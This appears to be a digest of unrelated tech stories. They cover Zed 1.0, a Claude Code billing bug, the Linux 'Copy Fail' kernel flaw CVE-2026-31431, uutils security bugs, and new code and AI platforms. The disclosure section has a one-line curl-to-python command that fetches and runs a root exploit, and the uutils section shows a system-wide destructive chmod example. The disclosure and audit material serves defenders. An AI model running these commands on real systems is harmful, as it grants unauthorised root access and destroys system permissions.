10 interesting stories served every morning and every evening.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, endless variations and edge cases across every stack: Git integration, SSH remoting, a Debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with "out of extra usage" (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => API Error: 400 "You're out of extra usage…"
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m "add hermes.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => "Hello!"
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
CVE-2026-31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
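As one hedged sketch of that last point, a container runtime that accepts OCI-style seccomp profiles (for example, `docker run --security-opt seccomp=block-afalg.json`) can deny socket() calls for the AF_ALG address family, which is number 38 on Linux. This is shown allow-by-default for brevity; in practice you would add the rule to your existing default profile, and you should verify the exact schema against your runtime's documentation.

```json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}
```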
Disclosure timeline
2026-03-23: Reported to Linux kernel security team
2026-03-24: Initial acknowledgment
2026-03-25: Patches proposed and reviewed
2026-04-01: Patch committed to mainline
2026-04-22: CVE-2026-31431 assigned
2026-04-29: Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
In April 2026, Canonical disclosed 44 CVEs in uutils, the Rust reimplementation of GNU coreutils that has shipped by default since Ubuntu 25.10. Most of them came out of an external audit commissioned ahead of the 26.04 LTS.
I read through the list and thought there’s a lot to learn from it.
What’s notable is that all of these bugs landed in a production Rust codebase, written by people who knew what they were doing, and none of them were caught by the borrow checker, clippy lints, or cargo audit.
I’m not writing this to criticize the uutils team. Quite the contrary; I actually want to thank them for sharing the audit results in such detail so that we can all learn from them.
We also had Jon Seager, VP Engineering for Ubuntu, on our ‘Rust in Production’ podcast recently and a lot of listeners appreciated his honesty about the state of Rust at Canonical.
If you write systems code in Rust, this is the most concentrated look at where Rust’s safety ends that you’ll likely find anywhere right now.
Don’t Trust a Path Across Two Syscalls
This is the largest cluster of bugs in the audit. It’s also the reason cp, mv, and rm are still GNU in Ubuntu 26.04 LTS. :(
The pattern is always the same. You do one syscall to check something about a path, then another syscall to act on the same path. Between those two calls, an attacker with write access to a parent directory can swap the path component for a symbolic link. The kernel re-resolves the path from scratch on the second call, and the privileged action lands on the attacker’s chosen target.
Rust’s standard library makes this easy to get wrong. The ergonomic APIs you reach for first (fs::metadata, File::create, fs::remove_file, fs::set_permissions) all take a path and re-resolve it every time, rather than taking a file descriptor and operating relative to that.
That’s fine for a normal program, but if you’re writing a privileged tool that needs to be secure against local attackers, you have to be careful.
Case Study: CVE-2026-35355
Here’s the bug, simplified from src/uu/install/src/install.rs.
// 1. Clear the destination
fs::remove_file(to)?;
// …
// 2. Create the destination. The path is re-resolved here!
let mut dest = File::create(to)?; // follows symlinks, truncates
copy(from, &mut dest)?;
Between step 1 and step 2, anyone with write access to the parent directory can plant to as a symlink to, say, /etc/shadow. Then File::create follows the symlink and the privileged process happily overwrites /etc/shadow with whatever from happened to contain.
The fix uses OpenOptions::create_new(true):
fs::remove_file(to)?;
let mut dest = OpenOptions::new()
.write(true)
.create_new(true)
.open(to)?;
copy(from, &mut dest)?;
The docs for create_new say (emphasis mine):
No file is allowed to exist at the target location, also no (dangling) symlink. In this way, if the call succeeds, the file returned is guaranteed to be new.
Rule: Anchor on a File Descriptor Instead
A &Path in Rust looks like a value, but remember that to the kernel it’s just a name. That name can point to different things from one syscall to the next.
Anchor your operations on a file descriptor instead.
create_new() only helps with that when you’re creating a new file. For everything else, open the parent directory once and work relative to that handle.
If you act on the same path twice, assume it’s a TOCTOU (Time Of Check To Time Of Use) bug until you’ve proven otherwise.
Set Permissions at Creation Time, Not After
This is a close relative of TOCTOU. You want a directory with restrictive permissions, so you write something like this.
// Create with default permissions
fs::create_dir(&path)?;
// Fix up permissions
fs::set_permissions(&path, Permissions::from_mode(0o700))?;
For a brief moment, path exists with the default permissions. Any other user on the system can open() it during that window. Once they have a file descriptor, the later chmod doesn’t take it away from them.
Rule: Set Permissions at Creation, Never After
Reach for OpenOptions::mode() and DirBuilderExt::mode() so the file or directory is born with the permissions you want. The kernel will apply your umask on top, so set that explicitly too if you really care.
String Equality on Paths Is Not the Same as Filesystem Identity
The original --preserve-root check in chmod was literally this:
if recursive && preserve_root && file == Path::new("/") {
return Err(PreserveRoot);
}
That comparison is bypassed by anything that resolves to / but isn't spelled /: /../, /./, /usr/.., or a symlink that points to /. Run chmod -R 000 /../ and watch it rip right past the check and lock down the whole system.
Here’s the fix:
fn is_root(file: &Path) -> bool {
matches!(fs::canonicalize(file), Ok(p) if p == Path::new("/"))
}
if recursive && preserve_root && is_root(file) {
return Err(PreserveRoot);
}
Rule: Resolve Paths Before Comparing Them
canonicalize resolves .., ., and symlinks into a real absolute path. That’s a lot better than string comparison.
Oh and if you were wondering about this line:
matches!(fs::canonicalize(file), Ok(p) if p == Path::new("/"))
I think that’s just a fancy way of saying
// First, resolve the path to its canonical form
if let Ok(p) = fs::canonicalize(file) {
// If that succeeded, check if the canonical path is “/”
p == Path::new("/")
} else {
false
}
In the specific case of --preserve-root, this works because / has no parent directory, so there's nothing for an attacker to swap from underneath you. In the more general case of comparing two arbitrary paths for filesystem identity, however, you'd want to open both and compare their (dev, inode) pairs, the way GNU coreutils does. (Think identity, not string equality.)
By the way, my favorite bug in this group is CVE-2026-35363:
rm . # ❌
rm .. # ❌
rm ./ # ✅
rm ./// # ✅
It refused . and .. but happily accepted ./ and .///, then deleted the current directory while printing Invalid input. 😅
Stay in Bytes at Unix Boundaries
Rust’s String and &str are always UTF-8.
That’s a great choice in 99% of all cases, but Unix paths, environment variables, arguments, and the inputs flowing through tools like cut, comm, and tr live in the messy world of bytes.
Every time a Rust program bridges that gap, it has three options.
Lossy conversion with from_utf8_lossy silently rewrites invalid bytes to U+FFFD. That's just fancy data corruption.
Strict conversion with unwrap or ? crashes or refuses to operate.
Staying in bytes with OsStr or &[u8] is what you should usually do.
The audit found bugs in both of the first two categories. Here’s an example.
Case Study: comm (CVE-2026-35346)
This is the original code, from src/uu/comm/src/comm.rs.
// ra, rb are &[u8], raw bytes from the input files.
print!("{}", String::from_utf8_lossy(ra));
print!("{delim}{}", String::from_utf8_lossy(rb));
GNU comm works on binary files because it just shuffles bytes around. The uutils version replaced anything that wasn’t valid UTF-8 with U+FFFD, which silently corrupted the output.
Here’s the fix: stay in bytes.
let mut out = BufWriter::new(io::stdout().lock());
out.write_all(ra)?;
out.write_all(delim)?;
out.write_all(rb)?;
print! forces a UTF-8 round-trip through Display. Write::write_all does not.
It writes the raw bytes directly to stdout.
Rule: Pick the Right Type for the Situation
For Unix-flavored systems code, use Path and PathBuf for filesystem paths, OsString for environment variables, and Vec<u8> or &[u8] for stream contents. It’s tempting to round-trip them through String for easier formatting, but that’s where the corruption creeps in.
UTF-8 is a great default for application strings, but it’s absolutely, positively the wrong default for the raw byte stuff Unix tools work with.
The code.overheid.nl (Dutch) platform is now live. It is the government-wide code platform for publishing and developing open-source software. The platform is fully self-hosted and supports digital sovereignty.
For now, this is a pilot using Forgejo, an open-source, European, and sovereign alternative to GitHub and GitLab. Not all government organisations can use the platform yet. Developers are invited to contribute, with the aim of eventually growing it into a shared Git platform for government bodies.
Get involved
The code platform is initiated by the Open Source Program Office at the Ministry of the Interior and Kingdom Relations (BZK), in collaboration with DAWO (SSC-ICT), Opensourcewerken (Dutch), and developer.overheid.nl. Interested in joining? Please email codeplatform@rijksoverheid.nl.
Further information is available in Dutch, in the blog ‘We gaan samen code.overheid.nl bouwen’ (‘We’re building code.overheid.nl together’) on developer.overheid.nl.
git is decentralized, but what of the rest?
GitHub seems to be crumbling the past couple of weeks. Whatever the reason, ultimately it's not great for 90% of the world's OSS to depend on one provider. Centralized systems always crumble; it's the emails, gits, and IRCs that stand the test of time. Tangled aims to fit in this space; allow me to explain.

Code collaboration has always made use of two protocols, one for code transfer and one for communication:

It began with the email flow: git (code transfer) + email (comms)
Then there was GitHub: git (code transfer) + GitHub the website (comms)
There is the ForgeFed project: git (code transfer) + maybe ActivityPub (comms)
We are building Tangled: git (code transfer) + AT protocol (comms)

Tangled federates events among git servers (called "knots"). You can collaborate on repositories on any server, and you can fork across servers. You can even push to a repository on your own server and open a pull request on a repo hosted on a completely different server. In a lot of ways, this is quite like hosting your own cgit instance and sending out patches via email.

Tangled uses AT to facilitate the Authenticated Transfer of events surrounding code, like issues and pull requests, and it also enables a few social bits: a timeline of events, follows, stars (and vouches very soon). AT is used to share collaborator invites and ssh pubkeys, but the rest is just good ol' git.

OSS needs to break free from monocultures like GitHub, but code collaboration should still be fun and social.
Coding agents have mostly lived on your laptop. Today we’re moving them to the cloud, where they run on their own, in parallel, and notify you when they’re done. You can start them from the Mistral Vibe CLI or directly in Le Chat, offloading a coding task without leaving the conversation.
Powering this is Mistral Medium 3.5 in public preview, our new default model in Mistral Vibe and Le Chat, built to run for long stretches on coding and productivity work. The new Work mode in Le Chat (Preview) extends this with a powerful agent for complex, multi-step tasks like research, analysis, and cross-tool actions.
Highlights.
Mistral Medium 3.5, a new flagship model that merges instruction-following, reasoning, and coding into a single 128B dense model. Released as open weights, under a modified MIT license.
Strong real-world performance at a size that runs self-hosted on as few as four GPUs.
Mistral Vibe remote agents for async coding: sessions run in the cloud, can be spawned from the CLI or Le Chat, and a local CLI session can be teleported up to the cloud.
Start Mistral Vibe coding tasks in Le Chat. Sessions run on the same remote runtime and keep going while you step away.
Work mode in Le Chat runs on a new agent, powered by Mistral Medium 3.5, that works through multi-step tasks, calling tools in parallel until the job is done.
Mistral Medium 3.5.
Mistral Medium 3.5 is our first flagship merged model, available in public preview. It is a dense 128B model with a 256k context window, handling instruction-following, reasoning, and coding in a single set of weights. It performs strongly in real-world use, with self-hosting possible on as few as four GPUs. Reasoning effort is now configurable per request, so the same model can answer a quick chat reply or work through a complex agentic run. We trained the vision encoder from scratch to handle variable image sizes and aspect ratios.
Mistral Medium 3.5 scores 77.6% on SWE-Bench Verified, ahead of Devstral 2 and models like Qwen3.5 397B A17B. It also has strong agentic capabilities and scores 91.4 on τ³-Telecom.
The model was built for long-horizon tasks, calling multiple tools reliably, and producing structured output that downstream code can consume. It is the model that made async cloud agents in Vibe practical to ship.
Mistral Medium 3.5 becomes the default model in Le Chat. It also replaces Devstral 2 in our coding agent, Vibe CLI.
Vibe remote agents.
From today, coding sessions can work through long tasks while you’re away. Many can run in parallel, and you stop being the bottleneck on every step the agent takes.
You can start the cloud agents from the Mistral Vibe CLI or from Le Chat. While they run, you can inspect what the agent is doing, with file diffs, tool calls, progress states, and questions surfaced as you go. Ongoing local CLI sessions can be teleported up to the cloud when you want to leave them running, with session history, task state, and approvals carrying across.
Vibe sits between the systems engineering teams already use, with humans in the loop wherever they’re needed. It plugs into GitHub for code and pull requests, Linear and Jira for issues, Sentry for incidents, and apps like Slack or Teams for reporting.
Each coding session runs in an isolated sandbox, including broad edits and installs. When the work is done, the agent can open a pull request on GitHub and notify you, so you review the result instead of every keystroke that produced it.
It fits the high-volume, well-defined work that takes a developer’s time without taking their judgment: module refactors, test generation, dependency upgrades, CI investigations, as well as bug fixes.
We use Workflows orchestrated in Mistral Studio to bring Mistral Vibe into Le Chat. We originally built this for our own in-house coding environment, then for our enterprise customers. Today we're opening the capability to everyone: you can launch coding tasks from the web, and without being tied to a local terminal, a developer can run several in parallel.
You can start coding sessions directly in Le Chat, so a task described in chat runs on the same remote runtime as the CLI and the web, and comes back later as a finished branch or a draft PR.
New Work mode in Le Chat (Preview).
Work mode is a powerful new agentic mode for complex tasks in Le Chat, powered by a new harness and Mistral Medium 3.5. The agent becomes the execution backend for the assistant itself, so Le Chat can read and write, use several tools at once, and work through multi-step projects until it completes what you’ve asked.
Here’s what Work mode enables you to do today.
Cross-tool workflows: catch up across email, messages, and calendar in a single run; prepare for a meeting with attendee context, latest news, and talking points pulled from your sources.
Research and synthesis: dive into a topic across the web, internal docs, and connected tools, then produce a structured brief or report you can edit before exporting or sending.
Triage your inbox and draft replies; create issues in Jira from your team and customer discussions; send a summary to your team on Slack.
Sessions persist longer than a typical chat reply, so an agent can keep going across many turns, through trial-and-error, and through to completion. In Work mode, connectors are on by default rather than chosen manually, which lets the agent reach into documents, mailboxes, calendars, and other systems for the rich context it needs to take correct action.
Every action the agent takes is visible: you see each tool call and the thinking rationale. Le Chat will ask for explicit approval—based on your permissions—before proceeding with sensitive tasks like sending a message, writing a document, or modifying data.
Get started.
Mistral Medium 3.5 is available today in Mistral Vibe and Le Chat, and powers remote coding agents and Work mode in Le Chat on the Pro, Team, and Enterprise plans.
Through API, it’s priced at $1.5 per million input tokens and $7.5 per million output tokens. Open weights are on Hugging Face under a modified MIT license.
It is also available for prototyping, hosted on NVIDIA GPU-accelerated endpoints on build.nvidia.com and as a scalable containerized inference microservice, NVIDIA NIM.
Build the future of agentic systems with us.
We’re hiring across research, engineering, and product to push agentic systems further. See our open roles.